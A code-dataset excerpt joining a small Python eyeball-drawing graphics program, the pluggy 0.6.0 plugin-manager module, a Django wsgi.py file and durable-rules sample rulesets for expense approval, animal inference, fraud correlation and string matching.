    bounds are not refreshed after a move, so only the first update is
    exact -- preserved as-is.
    """

    def __init__(self, win, centerPoint):
        self.window = win
        cx = centerPoint.getX()
        cy = centerPoint.getY()
        # Outer white square, 10px in each direction from center.
        self.minX = cx - 10
        self.maxX = cx + 10
        self.minY = cy - 10
        self.maxY = cy + 10
        self.eyeOutline = Rectangle(Point(self.minX, self.minY),
                                    Point(self.maxX, self.maxY))
        self.eyeOutline.setFill('white')
        self.eyeOutline.draw(win)
        # Inner black pupil, 5px in each direction from center.
        self.pupilMinX = cx - 5
        self.pupilMaxX = cx + 5
        self.eyePupil = Rectangle(Point(self.pupilMinX, cy - 5),
                                  Point(self.pupilMaxX, cy + 5))
        self.eyePupil.setFill('black')
        self.eyePupil.draw(win)

    def updatePupil(self, newPoint):
        """Slide the pupil horizontally toward newPoint, clamped to the
        eye outline; no movement if the click is within the pupil span."""
        x = newPoint.getX()
        dX = 0
        if x >= self.pupilMaxX:
            # Move right, but never past the outline's right edge.
            dX = min(x, self.maxX) - self.pupilMaxX
        elif x <= self.pupilMinX:
            # Move left, but never past the outline's left edge.
            dX = max(x, self.minX) - self.pupilMinX
        self.eyePupil.move(dX, 0)
def main():
    """Draw five eyes along a diagonal, then make them all 'look' at the
    first mouse click."""
    win = GraphWin('Someones Watching Me', 500, 500)
    eyes = [Eyeball(win, Point(c, c)) for c in (100, 150, 200, 250, 300)]
    target = win.getMouse()
    for eye in eyes:
        eye.updatePupil(target)
main()
| [
"noreply@github.com"
] | noreply@github.com |
6f99e6b311c7eecce9e8f157f5fb900757946d82 | 5d67ef491e8b09b5fc15dcc85df593c212552fe0 | /.eggs/pluggy-0.6.0-py3.6.egg/pluggy/__init__.py | 2d7a84dfe1ed8a0b22315c9b58c1b9918bb296e1 | [
"MIT"
] | permissive | dyspop/responsysrest | 5a90827553010c4d3e860dddc9117cb731503864 | 7b8e9edab1808f753be6383c7925529775a4fa89 | refs/heads/master | 2021-03-22T04:18:39.478652 | 2019-05-01T19:26:49 | 2019-05-01T19:26:49 | 110,168,191 | 1 | 1 | MIT | 2018-07-19T14:07:56 | 2017-11-09T21:28:46 | Python | UTF-8 | Python | false | false | 26,219 | py | import inspect
import warnings
from .callers import _multicall, HookCallError, _Result, _legacymulticall
__version__ = "0.6.0"
__all__ = [
"PluginManager",
"PluginValidationError",
"HookCallError",
"HookspecMarker",
"HookimplMarker",
]
class PluginValidationError(Exception):
    """ plugin failed validation. """
class HookspecMarker(object):
    """Decorator helper class for marking functions as hook specifications.

    Instantiate with a project_name to obtain a decorator.  A later call to
    PluginManager.add_hookspecs will discover every marked function when the
    PluginManager was created with the same project_name.
    """

    def __init__(self, project_name):
        self.project_name = project_name

    def __call__(self, function=None, firstresult=False, historic=False):
        """Mark *function* as a hook specification, or (when called with no
        function) return a decorator that does so with the given options.

        firstresult=True makes the 1:N hook call (N = number of registered
        hook implementations) stop at the first non-None result.

        historic=True memorizes calls to the hook and replays them on
        plugins registered later.  The two options are mutually exclusive.
        """
        def mark(func):
            if historic and firstresult:
                raise ValueError("cannot have a historic firstresult hook")
            opts = dict(firstresult=firstresult, historic=historic)
            setattr(func, self.project_name + "_spec", opts)
            return func

        return mark(function) if function is not None else mark
class HookimplMarker(object):
    """Decorator helper class for marking functions as hook implementations.

    Instantiate with a project_name to obtain a decorator.  A later call to
    PluginManager.register will discover every marked function when the
    PluginManager was created with the same project_name.
    """

    def __init__(self, project_name):
        self.project_name = project_name

    def __call__(self, function=None, hookwrapper=False, optionalhook=False,
                 tryfirst=False, trylast=False):
        """Mark *function* as a hook implementation, or (when called with no
        function) return a decorator that does so with the given options.

        optionalhook=True suppresses the error normally raised when no
        matching hook specification exists.

        tryfirst=True runs this implementation as early as possible in the
        chain of N implementations; trylast=True runs it as late as
        possible.

        hookwrapper=True requires the implementation to contain exactly one
        "yield": code before the yield runs before any non-hookwrapper
        implementation, code after it runs after all of them, and the yield
        receives a ``_Result`` describing the inner calls' outcome.
        """
        def mark(func):
            opts = dict(
                hookwrapper=hookwrapper,
                optionalhook=optionalhook,
                tryfirst=tryfirst,
                trylast=trylast,
            )
            setattr(func, self.project_name + "_impl", opts)
            return func

        return mark if function is None else mark(function)
def normalize_hookimpl_opts(opts):
    """Fill in False defaults for any hookimpl option missing from *opts*
    (mutates the dict in place)."""
    for key in ("tryfirst", "trylast", "hookwrapper", "optionalhook"):
        opts.setdefault(key, False)
class _TagTracer(object):
    """Root tracer: formats tagged messages, optionally writes them through a
    configurable writer and dispatches them to per-tag-tuple processors."""

    def __init__(self):
        self._tag2proc = {}  # tag tuple -> processor callable
        self.writer = None   # callable receiving the formatted text, or None
        self.indent = 0      # indentation level applied when formatting

    def get(self, name):
        """Return a sub-tracer whose messages carry the tag ``name``."""
        return _TagTracerSub(self, (name,))

    def format_message(self, tags, args):
        """Render ``args`` as a list of output lines.

        A trailing dict in ``args`` is rendered as indented
        ``name: value`` detail lines.
        """
        if isinstance(args[-1], dict):
            extra, args = args[-1], args[:-1]
        else:
            extra = {}
        pad = " " * self.indent
        text = " ".join(str(piece) for piece in args)
        out = ["%s%s [%s]\n" % (pad, text, ":".join(tags))]
        for key, value in extra.items():
            out.append("%s %s: %s\n" % (pad, key, value))
        return out

    def processmessage(self, tags, args):
        if self.writer is not None and args:
            self.writer("".join(self.format_message(tags, args)))
        try:
            # a missing processor for this tag tuple is simply ignored
            self._tag2proc[tags](tags, args)
        except KeyError:
            pass

    def setwriter(self, writer):
        self.writer = writer

    def setprocessor(self, tags, processor):
        # accept "a:b" shorthand for the tag tuple ("a", "b")
        if isinstance(tags, str):
            tags = tuple(tags.split(":"))
        else:
            assert isinstance(tags, tuple)
        self._tag2proc[tags] = processor
class _TagTracerSub(object):
    """Cheap handle pairing a root _TagTracer with a fixed tag tuple."""

    def __init__(self, root, tags):
        self.root = root
        self.tags = tags

    def get(self, name):
        """Return a child tracer with ``name`` appended to our tag tuple."""
        return self.__class__(self.root, self.tags + (name,))

    def setmyprocessor(self, processor):
        # register ``processor`` on the root for exactly our tag tuple
        self.root.setprocessor(self.tags, processor)

    def __call__(self, *args):
        # emit a message through the root tracer under our tags
        self.root.processmessage(self.tags, args)
class _TracedHookExecution(object):
    """Instrumentation wrapper installed as a PluginManager's inner hook
    executor; runs ``before``/``after`` callbacks around every hook call.
    Installed on construction, removed again via ``undo()``.
    """

    def __init__(self, pluginmanager, before, after):
        self.pluginmanager = pluginmanager
        self.before = before
        self.after = after
        # remember the executor being wrapped so undo() can reinstall it;
        # never stack two tracers on top of each other
        self.oldcall = pluginmanager._inner_hookexec
        assert not isinstance(self.oldcall, _TracedHookExecution)
        self.pluginmanager._inner_hookexec = self

    def __call__(self, hook, hook_impls, kwargs):
        self.before(hook.name, hook_impls, kwargs)
        outcome = _Result.from_call(
            lambda: self.oldcall(hook, hook_impls, kwargs)
        )
        self.after(outcome, hook.name, hook_impls, kwargs)
        return outcome.get_result()

    def undo(self):
        # restore the executor captured at construction time
        self.pluginmanager._inner_hookexec = self.oldcall
class PluginManager(object):
    """ Core Pluginmanager class which manages registration
    of plugin objects and 1:N hook calling.
    You can register new hooks by calling ``add_hookspec(module_or_class)``.
    You can register plugin objects (which contain hooks) by calling
    ``register(plugin)``. The Pluginmanager is initialized with a
    prefix that is searched for in the names of the dict of registered
    plugin objects. An optional excludefunc allows to blacklist names which
    are not considered as hooks despite a matching prefix.
    For debugging purposes you can call ``enable_tracing()``
    which will subsequently send debug information to the trace helper.
    """
    def __init__(self, project_name, implprefix=None):
        """ if implprefix is given implementation functions
        will be recognized if their name matches the implprefix. """
        self.project_name = project_name
        # plugin name -> plugin object; a value of None marks a blocked name
        self._name2plugin = {}
        # plugin object -> list of _HookCaller objects it participates in
        self._plugin2hookcallers = {}
        # (plugin, setuptools distribution) pairs loaded via entry points
        self._plugin_distinfo = []
        self.trace = _TagTracer().get("pluginmanage")
        # namespace object carrying one _HookCaller attribute per hook name
        self.hook = _HookRelay(self.trace.root.get("hook"))
        self._implprefix = implprefix
        # default executor; enable_tracing() may wrap it with a tracer
        self._inner_hookexec = lambda hook, methods, kwargs: hook.multicall(
            methods, kwargs, firstresult=hook.spec_opts.get("firstresult")
        )
    def _hookexec(self, hook, methods, kwargs):
        # called from all hookcaller instances.
        # enable_tracing will set its own wrapping function at self._inner_hookexec
        return self._inner_hookexec(hook, methods, kwargs)
    def register(self, plugin, name=None):
        """ Register a plugin and return its canonical name or None if the name
        is blocked from registering. Raise a ValueError if the plugin is already
        registered. """
        plugin_name = name or self.get_canonical_name(plugin)
        if plugin_name in self._name2plugin or plugin in self._plugin2hookcallers:
            if self._name2plugin.get(plugin_name, -1) is None:
                return  # blocked plugin, return None to indicate no registration
            raise ValueError(
                "Plugin already registered: %s=%s\n%s"
                % (plugin_name, plugin, self._name2plugin)
            )
        # XXX if an error happens we should make sure no state has been
        # changed at point of return
        self._name2plugin[plugin_name] = plugin
        # register matching hook implementations of the plugin
        self._plugin2hookcallers[plugin] = hookcallers = []
        for name in dir(plugin):
            hookimpl_opts = self.parse_hookimpl_opts(plugin, name)
            if hookimpl_opts is not None:
                normalize_hookimpl_opts(hookimpl_opts)
                method = getattr(plugin, name)
                hookimpl = HookImpl(plugin, plugin_name, method, hookimpl_opts)
                hook = getattr(self.hook, name, None)
                if hook is None:
                    # first implementation seen for this hook name: create
                    # the caller even though no spec may exist yet
                    hook = _HookCaller(name, self._hookexec)
                    setattr(self.hook, name, hook)
                elif hook.has_spec():
                    self._verify_hook(hook, hookimpl)
                    hook._maybe_apply_history(hookimpl)
                hook._add_hookimpl(hookimpl)
                hookcallers.append(hook)
        return plugin_name
    def parse_hookimpl_opts(self, plugin, name):
        """Return the hookimpl options dict for attribute ``name`` of
        ``plugin``, or None if the attribute is not a hook implementation."""
        method = getattr(plugin, name)
        if not inspect.isroutine(method):
            return
        try:
            res = getattr(method, self.project_name + "_impl", None)
        except Exception:
            res = {}
        if res is not None and not isinstance(res, dict):
            # false positive
            res = None
        elif res is None and self._implprefix and name.startswith(self._implprefix):
            # prefix-based recognition (legacy style, no marker decorator)
            res = {}
        return res
    def unregister(self, plugin=None, name=None):
        """ unregister a plugin object and all its contained hook implementations
        from internal data structures. """
        if name is None:
            assert plugin is not None, "one of name or plugin needs to be specified"
            name = self.get_name(plugin)
        if plugin is None:
            plugin = self.get_plugin(name)
        # if self._name2plugin[name] == None registration was blocked: ignore
        if self._name2plugin.get(name):
            del self._name2plugin[name]
        for hookcaller in self._plugin2hookcallers.pop(plugin, []):
            hookcaller._remove_plugin(plugin)
        return plugin
    def set_blocked(self, name):
        """ block registrations of the given name, unregister if already registered. """
        self.unregister(name=name)
        self._name2plugin[name] = None
    def is_blocked(self, name):
        """ return True if the name blocks registering plugins of that name. """
        return name in self._name2plugin and self._name2plugin[name] is None
    def add_hookspecs(self, module_or_class):
        """ add new hook specifications defined in the given module_or_class.
        Functions are recognized if they have been decorated accordingly. """
        names = []
        for name in dir(module_or_class):
            spec_opts = self.parse_hookspec_opts(module_or_class, name)
            if spec_opts is not None:
                hc = getattr(self.hook, name, None)
                if hc is None:
                    hc = _HookCaller(name, self._hookexec, module_or_class, spec_opts)
                    setattr(self.hook, name, hc)
                else:
                    # plugins registered this hook without knowing the spec
                    hc.set_specification(module_or_class, spec_opts)
                    for hookfunction in hc._wrappers + hc._nonwrappers:
                        self._verify_hook(hc, hookfunction)
                names.append(name)
        if not names:
            raise ValueError(
                "did not find any %r hooks in %r" % (self.project_name, module_or_class)
            )
    def parse_hookspec_opts(self, module_or_class, name):
        """Return the hookspec options for attribute ``name``, or None."""
        method = getattr(module_or_class, name)
        return getattr(method, self.project_name + "_spec", None)
    def get_plugins(self):
        """ return the set of registered plugins. """
        return set(self._plugin2hookcallers)
    def is_registered(self, plugin):
        """ Return True if the plugin is already registered. """
        return plugin in self._plugin2hookcallers
    def get_canonical_name(self, plugin):
        """ Return canonical name for a plugin object. Note that a plugin
        may be registered under a different name which was specified
        by the caller of register(plugin, name). To obtain the name
        of a registered plugin use ``get_name(plugin)`` instead."""
        return getattr(plugin, "__name__", None) or str(id(plugin))
    def get_plugin(self, name):
        """ Return a plugin or None for the given name. """
        return self._name2plugin.get(name)
    def has_plugin(self, name):
        """ Return True if a plugin with the given name is registered. """
        return self.get_plugin(name) is not None
    def get_name(self, plugin):
        """ Return name for registered plugin or None if not registered. """
        for name, val in self._name2plugin.items():
            if plugin == val:
                return name
    def _verify_hook(self, hook, hookimpl):
        """Check ``hookimpl`` against the spec of ``hook``; raise
        PluginValidationError on historic/hookwrapper conflicts or on
        arguments not declared in the hookspec."""
        if hook.is_historic() and hookimpl.hookwrapper:
            raise PluginValidationError(
                "Plugin %r\nhook %r\nhistoric incompatible to hookwrapper"
                % (hookimpl.plugin_name, hook.name)
            )
        # positional arg checking
        notinspec = set(hookimpl.argnames) - set(hook.argnames)
        if notinspec:
            raise PluginValidationError(
                "Plugin %r for hook %r\nhookimpl definition: %s\n"
                "Argument(s) %s are declared in the hookimpl but "
                "can not be found in the hookspec"
                % (
                    hookimpl.plugin_name,
                    hook.name,
                    _formatdef(hookimpl.function),
                    notinspec,
                )
            )
    def check_pending(self):
        """ Verify that all hooks which have not been verified against
        a hook specification are optional, otherwise raise PluginValidationError"""
        for name in self.hook.__dict__:
            if name[0] != "_":
                hook = getattr(self.hook, name)
                if not hook.has_spec():
                    for hookimpl in hook._wrappers + hook._nonwrappers:
                        if not hookimpl.optionalhook:
                            raise PluginValidationError(
                                "unknown hook %r in plugin %r" % (name, hookimpl.plugin)
                            )
    def load_setuptools_entrypoints(self, entrypoint_name):
        """ Load modules from querying the specified setuptools entrypoint name.
        Return the number of loaded plugins. """
        from pkg_resources import (
            iter_entry_points,
            DistributionNotFound,
            VersionConflict,
        )
        for ep in iter_entry_points(entrypoint_name):
            # is the plugin registered or blocked?
            if self.get_plugin(ep.name) or self.is_blocked(ep.name):
                continue
            try:
                plugin = ep.load()
            except DistributionNotFound:
                # best effort: skip plugins whose distribution is missing
                continue
            except VersionConflict as e:
                raise PluginValidationError(
                    "Plugin %r could not be loaded: %s!" % (ep.name, e)
                )
            self.register(plugin, name=ep.name)
            self._plugin_distinfo.append((plugin, ep.dist))
        return len(self._plugin_distinfo)
    def list_plugin_distinfo(self):
        """ return list of distinfo/plugin tuples for all setuptools registered
        plugins. """
        return list(self._plugin_distinfo)
    def list_name_plugin(self):
        """ return list of name/plugin pairs. """
        return list(self._name2plugin.items())
    def get_hookcallers(self, plugin):
        """ get all hook callers for the specified plugin. """
        return self._plugin2hookcallers.get(plugin)
    def add_hookcall_monitoring(self, before, after):
        """ add before/after tracing functions for all hooks
        and return an undo function which, when called,
        will remove the added tracers.
        ``before(hook_name, hook_impls, kwargs)`` will be called ahead
        of all hook calls and receive a hookcaller instance, a list
        of HookImpl instances and the keyword arguments for the hook call.
        ``after(outcome, hook_name, hook_impls, kwargs)`` receives the
        same arguments as ``before`` but also a :py:class:`_Result`` object
        which represents the result of the overall hook call.
        """
        return _TracedHookExecution(self, before, after).undo
    def enable_tracing(self):
        """ enable tracing of hook calls and return an undo function. """
        hooktrace = self.hook._trace
        def before(hook_name, methods, kwargs):
            hooktrace.root.indent += 1
            hooktrace(hook_name, kwargs)
        def after(outcome, hook_name, methods, kwargs):
            if outcome.excinfo is None:
                hooktrace("finish", hook_name, "-->", outcome.get_result())
            hooktrace.root.indent -= 1
        return self.add_hookcall_monitoring(before, after)
    def subset_hook_caller(self, name, remove_plugins):
        """ Return a new _HookCaller instance for the named method
        which manages calls to all registered plugins except the
        ones from remove_plugins. """
        orig = getattr(self.hook, name)
        plugins_to_remove = [plug for plug in remove_plugins if hasattr(plug, name)]
        if plugins_to_remove:
            hc = _HookCaller(
                orig.name, orig._hookexec, orig._specmodule_or_class, orig.spec_opts
            )
            for hookimpl in orig._wrappers + orig._nonwrappers:
                plugin = hookimpl.plugin
                if plugin not in plugins_to_remove:
                    hc._add_hookimpl(hookimpl)
                    # we also keep track of this hook caller so it
                    # gets properly removed on plugin unregistration
                    self._plugin2hookcallers.setdefault(plugin, []).append(hc)
            return hc
        return orig
def varnames(func):
    """Return tuple of positional and keyword argument names for a function,
    method, class or callable.

    In case of a class, its ``__init__`` method is considered.
    For methods the ``self`` parameter is not included.
    """
    # results are memoized on the object's __dict__ when it is writable
    cache = getattr(func, "__dict__", {})
    try:
        return cache["_varnames"]
    except KeyError:
        pass
    if inspect.isclass(func):
        try:
            func = func.__init__
        except AttributeError:
            return (), ()
    elif not inspect.isroutine(func):  # callable object?
        try:
            func = getattr(func, "__call__", func)
        except Exception:
            # bug fix: previously returned a bare () here, breaking the
            # documented (args, defaults) pair contract of this function
            return (), ()
    try:  # func MUST be a function or method here or we won't parse any args
        spec = _getargspec(func)
    except TypeError:
        return (), ()
    args, defaults = tuple(spec.args), spec.defaults
    if defaults:
        index = -len(defaults)
        args, defaults = args[:index], tuple(args[index:])
    else:
        defaults = ()
    # strip any implicit instance arg
    if args:
        if inspect.ismethod(func) or (
            "." in getattr(func, "__qualname__", ()) and args[0] == "self"
        ):
            args = args[1:]
    assert "self" not in args  # best naming practises check?
    try:
        cache["_varnames"] = args, defaults
    except TypeError:
        # cache may be read-only (e.g. the {} fallback or a mappingproxy)
        pass
    return args, defaults
class _HookRelay(object):
    """Namespace object holding one _HookCaller attribute per known hook.

    Used for performing 1:N hook calls, N being the number of registered
    plugins.
    """

    def __init__(self, trace):
        self._trace = trace
class _HookCaller(object):
    """Callable representing one named hook.

    Holds the optional hook specification plus the ordered lists of
    registered implementations (wrappers and non-wrappers) and dispatches
    1:N calls through the plugin manager's executor.
    """

    def __init__(self, name, hook_execute, specmodule_or_class=None, spec_opts=None):
        self.name = name
        self._wrappers = []
        self._nonwrappers = []
        self._hookexec = hook_execute
        self._specmodule_or_class = None
        self.argnames = None
        self.kwargnames = None
        self.multicall = _multicall
        self.spec_opts = spec_opts or {}
        if specmodule_or_class is not None:
            self.set_specification(specmodule_or_class, spec_opts)

    def has_spec(self):
        """Return True once a hook specification has been set."""
        return self._specmodule_or_class is not None

    def set_specification(self, specmodule_or_class, spec_opts):
        assert not self.has_spec()
        self._specmodule_or_class = specmodule_or_class
        specfunc = getattr(specmodule_or_class, self.name)
        # get spec arg signature
        argnames, self.kwargnames = varnames(specfunc)
        self.argnames = ["__multicall__"] + list(argnames)
        self.spec_opts.update(spec_opts)
        if spec_opts.get("historic"):
            self._call_history = []

    def is_historic(self):
        """True if this hook replays past calls to late-registered plugins."""
        return hasattr(self, "_call_history")

    def _remove_plugin(self, plugin):
        def remove(wrappers):
            for i, method in enumerate(wrappers):
                if method.plugin == plugin:
                    del wrappers[i]
                    return True

        if remove(self._wrappers) is None:
            if remove(self._nonwrappers) is None:
                raise ValueError("plugin %r not found" % (plugin,))

    def _add_hookimpl(self, hookimpl):
        """Add an implementation to the callback chain.
        """
        if hookimpl.hookwrapper:
            methods = self._wrappers
        else:
            methods = self._nonwrappers
        if hookimpl.trylast:
            methods.insert(0, hookimpl)
        elif hookimpl.tryfirst:
            methods.append(hookimpl)
        else:
            # find last non-tryfirst method
            i = len(methods) - 1
            while i >= 0 and methods[i].tryfirst:
                i -= 1
            methods.insert(i + 1, hookimpl)
        if "__multicall__" in hookimpl.argnames:
            # bug fix: the two string literals previously concatenated to
            # "will beremoved" (missing space)
            warnings.warn(
                "Support for __multicall__ is now deprecated and will be "
                "removed in an upcoming release.",
                DeprecationWarning,
            )
            self.multicall = _legacymulticall

    def __repr__(self):
        return "<_HookCaller %r>" % (self.name,)

    def __call__(self, *args, **kwargs):
        if args:
            raise TypeError("hook calling supports only keyword arguments")
        assert not self.is_historic()
        if self.argnames:
            notincall = set(self.argnames) - set(["__multicall__"]) - set(kwargs.keys())
            if notincall:
                warnings.warn(
                    "Argument(s) {} which are declared in the hookspec "
                    "can not be found in this hook call".format(tuple(notincall)),
                    stacklevel=2,
                )
        return self._hookexec(self, self._nonwrappers + self._wrappers, kwargs)

    def call_historic(self, proc=None, kwargs=None):
        """ call the hook with given ``kwargs`` for all registered plugins and
        for all plugins which will be registered afterwards.
        If ``proc`` is not None it will be called for for each non-None result
        obtained from a hook implementation.
        """
        self._call_history.append((kwargs or {}, proc))
        # historizing hooks don't return results
        res = self._hookexec(self, self._nonwrappers + self._wrappers, kwargs)
        for x in res or []:
            proc(x)

    def call_extra(self, methods, kwargs):
        """ Call the hook with some additional temporarily participating
        methods using the specified kwargs as call parameters. """
        old = list(self._nonwrappers), list(self._wrappers)
        for method in methods:
            opts = dict(hookwrapper=False, trylast=False, tryfirst=False)
            hookimpl = HookImpl(None, "<temp>", method, opts)
            self._add_hookimpl(hookimpl)
        try:
            return self(**kwargs)
        finally:
            # restore the original implementation lists
            self._nonwrappers, self._wrappers = old

    def _maybe_apply_history(self, method):
        """Apply call history to a new hookimpl if it is marked as historic.
        """
        if self.is_historic():
            for kwargs, proc in self._call_history:
                res = self._hookexec(self, [method], kwargs)
                if res and proc is not None:
                    proc(res[0])
class HookImpl(object):
    """Bookkeeping record for a single hook-implementing function of a plugin."""
    def __init__(self, plugin, plugin_name, function, hook_impl_opts):
        # the actual implementation callable
        self.function = function
        # positional and keyword parameter names of the implementation
        self.argnames, self.kwargnames = varnames(self.function)
        self.plugin = plugin
        self.opts = hook_impl_opts
        self.plugin_name = plugin_name
        # mirror hookwrapper/optionalhook/tryfirst/trylast as attributes
        self.__dict__.update(hook_impl_opts)
# Select the argspec helper once at import time: Python 3 provides
# ``inspect.getfullargspec``; older interpreters only have ``getargspec``.
if hasattr(inspect, "getfullargspec"):
    _getargspec = inspect.getfullargspec
else:
    _getargspec = inspect.getargspec
# Render "name(signature)" for diagnostics, preferring the modern
# ``inspect.signature`` API when available.
if hasattr(inspect, "signature"):
    def _formatdef(func):
        return "%s%s" % (func.__name__, inspect.signature(func))
else:
    def _formatdef(func):
        return "%s%s" % (
            func.__name__,
            inspect.formatargspec(*inspect.getargspec(func)),
        )
| [
"dyspop@gmail.com"
] | dyspop@gmail.com |
58dda2f670c81b11dcb9b32b1a8eecf07da6dd98 | ddad20f9a5a43ff0b0f4970bc5fad7cd17731c5a | /shoppingmall/shoppingmall/wsgi.py | 0dee8197d435b55d9ceabcf2c7fec241ecbeee1b | [] | no_license | kimmyphua/coldStorageDjango | 6378a078f9333d419bd4f0fe4dbd9161c7cfd2fb | 67edcd9f7472eabc64e913860bbfe589cdfdba7a | refs/heads/master | 2023-06-26T06:08:43.193614 | 2021-07-02T04:28:08 | 2021-07-02T04:28:08 | 382,230,693 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for shoppingmall project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings module before the app object is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'shoppingmall.settings')
# Module-level WSGI callable picked up by WSGI servers (e.g. gunicorn/uwsgi).
application = get_wsgi_application()
| [
"kimberlyphuaweyhan@gmail.com"
] | kimberlyphuaweyhan@gmail.com |
7df222a3096911a226c3f83992df6226f8d6e79b | 1392d3ad3b04f321831c37d7e8441da8796691aa | /testpy/testsamples.py | a8f124737029fa48143c31476bd49f9ca71384db | [
"MIT"
] | permissive | cosmic-chichu/rules | 0ca82adc8d70fa9e4afbba92283ffa6c8f6e6cbe | f7de1c32a1e836888f54a2aecf9a51f29a7387b3 | refs/heads/master | 2021-09-17T11:26:13.352429 | 2018-07-01T16:14:04 | 2018-07-01T16:14:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,582 | py | from durable.lang import *
import threading
import datetime
# Sample: expense approval modeled as a statechart (input -> pending -> approved/denied).
with statechart('expense'):
    with state('input'):
        # amounts above 1000 are rejected immediately
        @to('denied')
        @when_all((m.subject == 'approve') & (m.amount > 1000))
        def denied(c):
            print ('expense denied')
        @to('pending')
        @when_all((m.subject == 'approve') & (m.amount <= 1000))
        def request(c):
            print ('requesting expense approva')
    with state('pending'):
        @to('approved')
        @when_all(m.subject == 'approved')
        def approved(c):
            print ('expense approved')
        @to('denied')
        @when_all(m.subject == 'denied')
        def denied(c):
            print ('expense denied')
    # terminal states
    state('denied')
    state('approved')
# Sample: forward-chaining inference over animal facts (classic frog/bird example).
with ruleset('animal'):
    @when_all(c.first << (m.predicate == 'eats') & (m.object == 'flies'),
              (m.predicate == 'lives') & (m.object == 'water') & (m.subject == c.first.subject))
    def frog(c):
        c.assert_fact({ 'subject': c.first.subject, 'predicate': 'is', 'object': 'frog' })
    @when_all(c.first << (m.predicate == 'eats') & (m.object == 'flies'),
              (m.predicate == 'lives') & (m.object == 'land') & (m.subject == c.first.subject))
    def chameleon(c):
        c.assert_fact({ 'subject': c.first.subject, 'predicate': 'is', 'object': 'chameleon' })
    @when_all((m.predicate == 'eats') & (m.object == 'worms'))
    def bird(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'bird' })
    @when_all((m.predicate == 'is') & (m.object == 'frog'))
    def green(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'green' })
    @when_all((m.predicate == 'is') & (m.object == 'chameleon'))
    def grey(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'grey' })
    @when_all((m.predicate == 'is') & (m.object == 'bird'))
    def black(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'black' })
    # catch-all: print every fact as it is asserted
    @when_all(+m.subject)
    def output(c):
        print ('Fact: {0} {1} {2}'.format(c.m.subject, c.m.predicate, c.m.object))
    @when_start
    def start(host):
        host.assert_fact('animal', { 'subject': 'Kermit', 'predicate': 'eats', 'object': 'flies' })
        host.assert_fact('animal', { 'subject': 'Kermit', 'predicate': 'lives', 'object': 'water' })
        host.assert_fact('animal', { 'subject': 'Greedy', 'predicate': 'eats', 'object': 'flies' })
        host.assert_fact('animal', { 'subject': 'Greedy', 'predicate': 'lives', 'object': 'land' })
        host.assert_fact('animal', { 'subject': 'Tweety', 'predicate': 'eats', 'object': 'worms' })
# Minimal hello-world ruleset: one antecedent, one consequent.
with ruleset('test'):
    # antecedent
    @when_all(m.subject == 'World')
    def say_hello(c):
        # consequent
        print('Hello {0}'.format(c.m.subject))
    # on ruleset start
    @when_start
    def start(host):
        host.post('test', { 'subject': 'World' })
# Simplified animal inference sample demonstrating rule chaining.
with ruleset('animal0'):
    # will be triggered by 'Kermit eats flies'
    @when_all((m.predicate == 'eats') & (m.object == 'flies'))
    def frog(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'frog' })
    @when_all((m.predicate == 'eats') & (m.object == 'worms'))
    def bird(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'bird' })
    # will be chained after asserting 'Kermit is frog'
    @when_all((m.predicate == 'is') & (m.object == 'frog'))
    def green(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'green' })
    @when_all((m.predicate == 'is') & (m.object == 'bird'))
    def black(c):
        c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'black' })
    @when_all(+m.subject)
    def output(c):
        print('Fact: {0} {1} {2}'.format(c.m.subject, c.m.predicate, c.m.object))
    @when_start
    def start(host):
        host.assert_fact('animal0', { 'subject': 'Kermit', 'predicate': 'eats', 'object': 'flies' })
# Event correlation sample: purchases from two different locations.
with ruleset('risk'):
    @when_all(c.first << m.t == 'purchase',
              c.second << m.location != c.first.location)
    # the event pair will only be observed once
    def fraud(c):
        print('Fraud detected -> {0}, {1}'.format(c.first.location, c.second.location))
    @when_start
    def start(host):
        # 'post' submits events, try 'assert' instead and to see differt behavior
        host.post('risk', {'t': 'purchase', 'location': 'US'});
        host.post('risk', {'t': 'purchase', 'location': 'CA'});
# Context-state sample: rules driven by the session state object 's'.
with ruleset('flow'):
    # state condition uses 's'
    @when_all(s.status == 'start')
    def start(c):
        # state update on 's'
        c.s.status = 'next'
        print('start')
    @when_all(s.status == 'next')
    def next(c):
        c.s.status = 'last'
        print('next')
    @when_all(s.status == 'last')
    def last(c):
        c.s.status = 'end'
        print('last')
        # deletes state at the end
        c.delete_state()
    @when_start
    def on_start(host):
        # modifies default context state
        host.patch_state('flow', { 'status': 'start' })
# Disjunction sample: either subject value triggers the rule.
with ruleset('expense0'):
    @when_all((m.subject == 'approve') | (m.subject == 'ok'))
    def approved(c):
        print ('Approved subject: {0}'.format(c.m.subject))
    @when_start
    def start(host):
        host.post('expense0', { 'subject': 'approve'})
# Regular-expression matching sample over a URL field.
with ruleset('match'):
    @when_all(m.url.matches('(https?://)?([0-9a-z.-]+)%.[a-z]{2,6}(/[A-z0-9_.-]+/?)*'))
    def approved(c):
        print ('match url ->{0}'.format(c.m.url))
    @when_start
    def start(host):
        host.post('match', { 'url': 'https://github.com' })
        host.post('match', { 'url': 'http://github.com/jruizgit/rul!es' })
        host.post('match', { 'url': 'https://github.com/jruizgit/rules/reference.md' })
        host.post('match', { 'url': '//rules'})
        host.post('match', { 'url': 'https://github.c/jruizgit/rules' })
# String matching sample: prefix, suffix and case-insensitive contains.
with ruleset('strings'):
    @when_all(m.subject.matches('hello.*'))
    def starts_with(c):
        print ('string starts with hello -> {0}'.format(c.m.subject))
    @when_all(m.subject.matches('.*hello'))
    def ends_with(c):
        print ('string ends with hello -> {0}'.format(c.m.subject))
    @when_all(m.subject.imatches('.*hello.*'))
    def contains(c):
        print ('string contains hello (case insensitive) -> {0}'.format(c.m.subject))
    @when_start
    def start(host):
        host.assert_fact('strings', { 'subject': 'HELLO world' })
        host.assert_fact('strings', { 'subject': 'world hello' })
